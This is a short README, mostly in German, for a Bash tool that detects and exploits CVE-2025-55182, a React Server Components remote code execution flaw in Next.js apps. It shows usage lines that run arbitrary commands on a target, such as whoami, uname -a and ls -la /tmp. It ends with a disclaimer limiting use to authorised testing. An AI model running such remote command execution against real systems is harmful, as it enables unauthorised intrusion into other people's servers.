
Bash-basierter Scanner zum Erkennen und Ausnutzen von CVE-2025-55182 (React Server Components RCE) in Next.js-Anwendungen. Unterstützt benutzerdefinierte Befehlsausführung und URL-Scanning.
Einfaches Befehlszeilen-Tool zum Erkennen und Ausnutzen von CVE-2025-55182 (React Server Components RCE) in Next.js-Anwendungen.

chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Ziel-Domain/URL (erforderlich)-c, --command - Auszuführender Befehl (Standard: )id# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Dieses Tool ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bestimmt. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben.